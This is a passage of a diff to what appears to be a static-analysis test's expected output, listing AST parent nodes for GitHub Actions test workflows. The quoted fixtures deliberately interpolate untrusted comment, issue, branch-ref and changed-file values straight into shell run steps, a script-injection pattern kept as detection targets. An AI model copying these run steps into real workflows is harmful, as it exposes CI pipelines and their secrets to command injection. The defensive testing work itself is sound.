utput}} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | parentNodes -| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | -| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | -| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | -| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | -| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | -| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | -| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | -| .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body 
}}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo 
'${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ 
github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | 
.github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | 
.github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | 
${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
